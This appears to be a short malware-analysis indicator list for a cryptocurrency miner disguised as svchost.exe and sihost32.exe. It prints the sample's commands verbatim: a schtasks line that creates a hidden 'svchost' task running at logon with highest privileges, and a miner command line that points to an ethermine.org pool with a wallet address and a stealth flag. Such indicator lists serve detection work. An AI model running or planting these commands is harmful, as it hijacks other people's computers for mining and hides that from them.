Technical Information
- <SYSTEM32>\tasks\svchost
- <SYSTEM32>\svchost.exe
- %TEMP%\svchost.exe
- %APPDATA%\microsoft\inc\sihost32.exe
- '%APPDATA%\microsoft\inc\sihost32.exe'
- '%TEMP%\svchost.exe'
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"%TEMP%\svchost.exe"' & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"%TEMP%\svchost.exe"' & exit
- '<SYSTEM32>\schtasks.exe' /create /f /sc onlogon /rl highest /tn "svchost" /tr '"%TEMP%\svchost.exe"'
- '<SYSTEM32>\svchost.exe' --response-timeout=30 --farm-retries=30 --pool stratum://`0x4a82b262BbF466b9F3f946C226CB8A672cFC2F9d`.Ccerumv@us1.ethermine.org:4444 --unam-stealth